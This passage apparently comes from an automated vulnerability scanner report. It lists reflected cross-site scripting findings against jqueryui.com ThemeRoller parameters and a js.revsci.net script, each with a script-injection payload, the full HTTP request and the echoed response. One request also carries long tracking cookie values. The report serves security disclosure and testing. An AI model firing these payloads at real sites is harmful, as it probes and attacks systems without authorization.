The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab231"><script>alert(1)</script>a044bec90e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ab231"><script>alert(1)</script>a044bec90e3=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:21:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 117123

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ab231"><script>alert(1)</script>a044bec90e3=1" type="text/css" media="all" />
...[SNIP]...

2.79. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b491a"><script>alert(1)</script>6437ba3b123 was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8pxb491a"><script>alert(1)</script>6437ba3b123&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:25 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8pxb491a"><script>alert(1)</script>6437ba3b123&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

2.80. http://jqueryui.com/themeroller/ [offsetTopShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c65d"><script>alert(1)</script>1ac0e87e35d was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px7c65d"><script>alert(1)</script>1ac0e87e35d&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
aaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px7c65d"><script>alert(1)</script>1ac0e87e35d&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

2.81. http://jqueryui.com/themeroller/ [opacityOverlay parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d9b9"><script>alert(1)</script>4b8fea3533e was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=305d9b9"><script>alert(1)</script>4b8fea3533e&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:20 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
xtureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=305d9b9"><script>alert(1)</script>4b8fea3533e&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all
...[SNIP]...

2.82. http://jqueryui.com/themeroller/ [opacityShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 911fc"><script>alert(1)</script>3c6b3b13c15 was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30911fc"><script>alert(1)</script>3c6b3b13c15&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120133

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30911fc"><script>alert(1)</script>3c6b3b13c15&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

2.83. http://jqueryui.com/themeroller/ [thicknessShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1d78"><script>alert(1)</script>e9417ff18c was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=dadada&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=000000&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=ffffff&iconColorContent=222222&bgColorDefault=8F8F8F&bgTextureDefault=04_highlight_hard.png&bgImgOpacityDefault=75&borderColorDefault=999999&fcDefault=000000&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=04_highlight_hard.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=000000&iconColorHover=454545&bgColorActive=dadada&bgTextureActive=04_highlight_hard.png&bgImgOpacityActive=75&borderColorActive=999999&fcActive=000000&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=05_inset_soft.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8pxb1d78"><script>alert(1)</script>e9417ff18c&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 06 Jul 2011 11:23:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8pxb1d78"><script>alert(1)</script>e9417ff18c&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

2.84. http://js.revsci.net/gateway/gw.js [csid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 6da49<script>alert(1)</script>f1f0690e9f was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=K087846da49<script>alert(1)</script>f1f0690e9f HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzENbgpj37xX1GlJO7a3wEU0cw3fRauBLbLa1hxIJOjDBlu18gnrOpSO3YjF0wMKV4ipvKrR3EogwrxHeNknjMH6SqUl22pXLAnFTV9qIeZlIZDHhyA0dnb6CwiAhxROt1YH8AVXH8382QGU/vgf98KjcLbIKBY60ENFOM7PSFI0WvHFebNnpD4olAZ8EKv0T8FyPx6DB7zblwlm/kfK0gsDM9HWwjjlpRArVpgdwu7hzWke/0YixMmmj5fRg6bBCx0SlvtbNmqCvsL9F+ThBet19A04HxTqU8b3nQhNZQGPBELixm9ZPLcb0nND8FSs5lEnuFkpXMu9XllQPRKily+32yrrvpvCQ5hdDDws3fRNKu9/VbXaqnftCbneHUzm69ZOZ0bU3GpkV37psEePMvYy5M9A1WMNQTLz3tsX5kfpLytLXUghOOqB/pQnGvlLrG3jR52bk5VGeRrE7ifz9y1n9uuhpUSHstnDVJAhckVdxAf0dhr+BzFueK6tJwy5o358GYKr4ry9mXUxrBhWdfeEgP0zm25Ih8ZAyh2cru1GAXaBOIKDNsQqAbhr4/x0AM3+BVLmPMMY12n3J+s4kc4awJtt7+FQgXo1NPLkMhjUdOAZcvjlggsTUMim918XskWnLFxgCEjyFn5gwnfpprqPLwri12NcuTcWLAKw8g0DdBvoeQgcr66oEHP6hTz2knqS5hfh0KTnj2uAkBw/WcyKvQ0K6mV+ujsqYMntEg3wHxat+ozLZkyYzVmCjTff6Yssgszk+Ln2nBOsMCNsu3grl8/mjf+JrnijOGn0fAJIpAgw5LSKbzNNFIEzolKLS9jsskM78jnojzRjl18iF6JsYngRg42f/OjDM/4XPdH/kiuKqMwT8neptYVN8gAeirQn83vTADE6vJdGN/m2j8Isv5DTBi+BvWFDALDwARgW2CrZCOjRaXOCH+mCDLkyaBfdswb3s8MQGf8OnLkXbgZxht6J0pymsopMR1/erCrDSKhaDjW3dbxj2Ec2ruEnAZ1K16NpPVlZAwGIQOKVna8Eph3bGwiPsyh0aVeLizRyS727aLulAX44yHYtN7pvQycigS4oAVgoexNRjIDXQytUbnNWFYeh1W4CDCtEi/GSzoQB+k1xV4aTQw6qbsH9WFgQsnQZ2p7dtgw1PcRM1q58YfPNexKh9bv3HYj68SoXzfuFseAwDbBWVFoQIV3np8KjOAy/XFT3w8wD3Uk2qoGAqY6jvE5IEg2CETzhFMgAby1SLgECONA+/NiEOpTsefwlKrp4QbyubMrUU8QqWcfpYLQmG7EEAZMaD61U30gLGpyTDz+XTK1Aetxz1XYZ7g1+7zdI+2Jz80HqzHAuVQrwbViu98spWaM0QPlKW5i8JhSI84NTuETOMs4sVoakoTsytqLu/NICBhVKXA9krf692p+28S/XtfL7pe+8ITPA3CXgdnZi3/sVFt5SczdpaBGG3fXkatl1cEkySH37s3Q5QzkvxK0JaT2hRSLjHvQq7V789ZV3A0rtyOhZFIU4m/biU0ASEvJJaC023+ugedPPFcdKly4XIbrT0vHawWP8xdGHsTFgGioYb1WZogmwmjaqZmwUg4TzO1mmsa6k7V+XnsdYiYLp1jN2z3CvCXdYQNY0GbpiIN0MYulPLdp0Qysc4z/0y9NO0uN8KHzT3mWvfthj1Naxji6UD7Fq59FA00aUdvRRrl9Ii2oMu/ZSC31YZhyTl8vy06iSMzRCHhgzGUXTrIr26/AOZ28M3xZjyQx4NbTI9+0/gv1qHeP0D+0GGfIi+c/Hnoj46u05Oz2rfd0IHItCcszLJpVkV7WgbA==; rsi_segs_1000000=pUP94z+huXIMH/C1v6FY5BD9CU6duy5U1bkTIGbg2kQ6O500fvSx4UTo+UUZb5s27MU/gF1/ux7sGskdcPE/6idJLlUd7AAuXxxKy8BUcq3cPyLWWekcccnlFzHzZkpIVGfqfRixeJKIBCGYBys6pp34bnWBjoi4hWw0DEv8dZ1MKmhKcNVsgETg9Nxm9eUl2bYV4lz3F2qKGE4AQLEr2EpApywjvzC6ooxJGX2EpUDKZlDNGVCwlbwye561cEN0B95VelQaph/AIlLefSqhn5oCS/k/ffgQkvaHKwO3Hq2Jzt8Egb1MjdZhZUG2cS4+A/q9YkInuHps6t/FPHBFw5HhQo4/Cnazuco89WTgh/dG0NX2NzX9OHtWRemoBuTHV9Uzk58uZ3qvc/CWxOl0LVo6Mubh94RiFrR2pY2eUGuzMIfxqu1g5tF34x6XqpYBxymEeg7y5u6rHubC+TdBqemh88ANgsz6DyIi8PlIddeOxKdS38ycSBeL7ivCg9OcwKHelps5XFngUJ3CsZmV1D8+myaR+JjiRqTsZ5lwsaSdrB1ttygPM0cJVYaoJtMmveKTqltFKrTirU5KmpF8YBVx81cnIA2P6JaVmf2NK10qC7myMOpZ9M0P7sDNtMtyhoW8vaHg+DQsVRT4OB3V/8sMk/tMnEbNnGx1TV0N3YMAdxJkT99c4I4VazVkf7e8/iyP8wGSmzPUsD5yKdOMe1AeGm4f8IRVXN+eZ/iJtioCfSYznCj/ZRVHpQ8GtMbVwmql1/CQzDUY; rtc_Vpu9=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; 